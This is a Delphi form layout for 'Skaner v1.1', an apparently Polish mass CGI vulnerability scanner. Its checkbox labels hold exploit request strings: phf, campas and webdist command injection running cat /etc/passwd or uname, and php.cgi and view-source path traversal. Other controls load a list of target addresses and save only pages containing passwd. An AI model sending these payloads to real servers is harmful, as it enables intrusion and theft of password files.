home *** CD-ROM | disk | FTP | other *** search
- object StartWindow: TStartWindow
- Left = 254
- Top = 179
- BorderIcons = [biSystemMenu, biMinimize]
- BorderStyle = bsSingle
- Caption = 'Skaner v1.1'
- ClientHeight = 341
- ClientWidth = 737
- Font.Charset = DEFAULT_CHARSET
- Font.Color = clWindowText
- Font.Height = -13
- Font.Name = 'MS Sans Serif'
- Font.Style = []
- OnClose = FormClose
- OnCreate = FormCreate
- PixelsPerInch = 120
- TextHeight = 16
- object Panel1: TPanel
- Left = 8
- Top = 8
- Width = 721
- Height = 325
- BevelInner = bvRaised
- BevelOuter = bvLowered
- TabOrder = 0
- object GB1: TGroupBox
- Left = 12
- Top = 4
- Width = 409
- Height = 309
- Caption = ' Wybierz jakie bugi chcesz sprawdzi� '
- TabOrder = 0
- object CheckBox1: TCheckBox
- Left = 12
- Top = 32
- Width = 385
- Height = 17
- TabStop = False
- Caption = '/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd'
- TabOrder = 0
- end
- object CheckBox2: TCheckBox
- Left = 12
- Top = 52
- Width = 385
- Height = 17
- TabStop = False
- Caption = '/cgi-bin/php.cgi?/etc/passwd'
- TabOrder = 1
- end
- object CheckBox3: TCheckBox
- Left = 12
- Top = 72
- Width = 385
- Height = 17
- TabStop = False
- Caption = '/cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a'
- TabOrder = 2
- end
- object CheckBox4: TCheckBox
- Left = 12
- Top = 92
- Width = 385
- Height = 17
- TabStop = False
- Caption = '/cgi-bin/phf?Qalias=hell%0auname%20-a%0a'
- TabOrder = 3
- end
- object CheckBox5: TCheckBox
- Left = 12
- Top = 112
- Width = 385
- Height = 17
- TabStop = False
- Caption = '/cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download'
- TabOrder = 4
- end
- object CheckBox6: TCheckBox
- Left = 12
- Top = 132
- Width = 385
- Height = 17
- TabStop = False
- Caption = '/cgi-bin/campas?%0acat%0a/etc/passwd%0a'
- TabOrder = 5
- end
- object CheckBox7: TCheckBox
- Left = 12
- Top = 152
- Width = 385
- Height = 17
- TabStop = False
- Caption = '/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd'
- TabOrder = 6
- end
- object CheckBox8: TCheckBox
- Left = 12
- Top = 172
- Width = 385
- Height = 17
- TabStop = False
- Caption = '/cgi-bin/view-source?../../../../../../../etc/passwd'
- TabOrder = 7
- end
- object Edit1: TEdit
- Left = 32
- Top = 196
- Width = 365
- Height = 24
- TabStop = False
- TabOrder = 8
- end
- object Edit2: TEdit
- Left = 32
- Top = 228
- Width = 365
- Height = 24
- TabStop = False
- TabOrder = 9
- end
- object CheckBox10: TCheckBox
- Left = 12
- Top = 232
- Width = 17
- Height = 17
- TabStop = False
- Caption = 'CheckBox10'
- TabOrder = 10
- end
- object CheckBox9: TCheckBox
- Left = 12
- Top = 200
- Width = 17
- Height = 17
- TabStop = False
- Caption = 'CheckBox9'
- TabOrder = 11
- end
- object CheckBox11: TCheckBox
- Left = 12
- Top = 264
- Width = 17
- Height = 17
- TabOrder = 12
- end
- object Edit3: TEdit
- Left = 32
- Top = 260
- Width = 365
- Height = 24
- TabOrder = 13
- end
- end
- object GB2: TGroupBox
- Left = 432
- Top = 4
- Width = 277
- Height = 89
- Caption = ' Plik z adresami '
- TabOrder = 1
- object LWybierzPlik: TLabel
- Left = 12
- Top = 60
- Width = 253
- Height = 16
- AutoSize = False
- end
- object BWybierzPlik: TButton
- Left = 12
- Top = 20
- Width = 121
- Height = 29
- Caption = 'Wybierz plik'
- TabOrder = 0
- TabStop = False
- OnClick = BWybierzPlikClick
- end
- end
- object GB4: TGroupBox
- Left = 432
- Top = 188
- Width = 277
- Height = 85
- Caption = ' Kt�re strony zapisa� '
- TabOrder = 2
- object RBZapiszWszystkie: TRadioButton
- Left = 12
- Top = 20
- Width = 253
- Height = 17
- Caption = 'Zapisz wszystkie strony'
- Checked = True
- TabOrder = 0
- TabStop = True
- end
- object RBZapiszWlasciwe: TRadioButton
- Left = 12
- Top = 40
- Width = 253
- Height = 17
- Caption = 'Zapisz te, kt�re nie zwr�c� b��du'
- TabOrder = 1
- end
- object RBZapiszPasswd: TRadioButton
- Left = 12
- Top = 60
- Width = 253
- Height = 17
- Caption = 'Zapisz tylko strony z passwd'
- TabOrder = 2
- end
- end
- object BSkanuj: TButton
- Left = 432
- Top = 284
- Width = 133
- Height = 29
- Caption = 'Skanuj'
- TabOrder = 3
- TabStop = False
- OnClick = BSkanujClick
- end
- object BZakoncz1: TButton
- Left = 576
- Top = 284
- Width = 133
- Height = 29
- Caption = 'Zako�cz'
- TabOrder = 4
- TabStop = False
- OnClick = BZakoncz1Click
- end
- object RichEditIP: TRichEdit
- Left = 420
- Top = 248
- Width = 13
- Height = 25
- TabOrder = 5
- Visible = False
- WordWrap = False
- end
- object GB3: TGroupBox
- Left = 432
- Top = 96
- Width = 277
- Height = 89
- Caption = ' Katalog na strony '
- TabOrder = 6
- object LWybierzKatalog: TLabel
- Left = 12
- Top = 60
- Width = 253
- Height = 16
- AutoSize = False
- end
- object BWybierzKatalog: TButton
- Left = 12
- Top = 20
- Width = 121
- Height = 29
- Caption = 'Wybierz katalog'
- TabOrder = 0
- TabStop = False
- OnClick = BWybierzKatalogClick
- end
- end
- object RichEditFind: TRichEdit
- Left = 708
- Top = 244
- Width = 13
- Height = 25
- TabOrder = 7
- Visible = False
- WordWrap = False
- end
- end
- object Panel2: TPanel
- Left = 8
- Top = 8
- Width = 721
- Height = 325
- BevelInner = bvRaised
- BevelOuter = bvLowered
- TabOrder = 1
- object LNatalis: TLabel
- Left = 28
- Top = 292
- Width = 133
- Height = 16
- AutoSize = False
- end
- object GB5: TGroupBox
- Left = 12
- Top = 4
- Width = 697
- Height = 233
- Caption = ' Wyniki '
- TabOrder = 0
- object RichEdit: TRichEdit
- Left = 12
- Top = 20
- Width = 673
- Height = 201
- HideScrollBars = False
- ReadOnly = True
- ScrollBars = ssVertical
- TabOrder = 0
- WordWrap = False
- end
- end
- object BZakoncz2: TButton
- Left = 588
- Top = 288
- Width = 121
- Height = 29
- Caption = 'Zako�cz'
- TabOrder = 1
- OnClick = BZakoncz2Click
- end
- object Panel3: TPanel
- Left = 12
- Top = 248
- Width = 697
- Height = 29
- BevelInner = bvRaised
- BevelOuter = bvLowered
- TabOrder = 2
- object LStatus: TLabel
- Left = 8
- Top = 8
- Width = 345
- Height = 16
- AutoSize = False
- end
- object LInfo: TLabel
- Left = 364
- Top = 8
- Width = 325
- Height = 16
- AutoSize = False
- end
- end
- object BOmin: TButton
- Left = 192
- Top = 288
- Width = 121
- Height = 29
- Caption = 'Omi�'
- TabOrder = 3
- Visible = False
- OnClick = BOminClick
- end
- object BZapisz: TButton
- Left = 456
- Top = 288
- Width = 121
- Height = 29
- Caption = 'Zapisz'
- TabOrder = 4
- OnClick = BZapiszClick
- end
- object BPrzerwij: TButton
- Left = 324
- Top = 288
- Width = 121
- Height = 29
- Caption = 'Przerwij'
- TabOrder = 5
- OnClick = BPrzerwijClick
- end
- end
- object OpenDialogPlik: TOpenDialog
- Left = 552
- Top = 28
- end
- object Http: THttpCli
- ProxyPort = '80'
- NoCache = False
- ContentTypePost = 'application/x-www-form-urlencoded'
- MultiThreaded = False
- OnDocData = HttpDocData
- Left = 584
- Top = 28
- end
- object OpenDialogKatalog: TOpenDialog
- FileName = 'none'
- Left = 552
- Top = 120
- end
- object SaveDialog: TSaveDialog
- DefaultExt = 'txt'
- Filter = 'Wszystkie pliki|*.*|Pliki tekstowe|*.txt'
- Left = 564
- Top = 292
- end
- object OnLineDetect: TOnLineDetect
- Left = 616
- Top = 28
- end
- end
-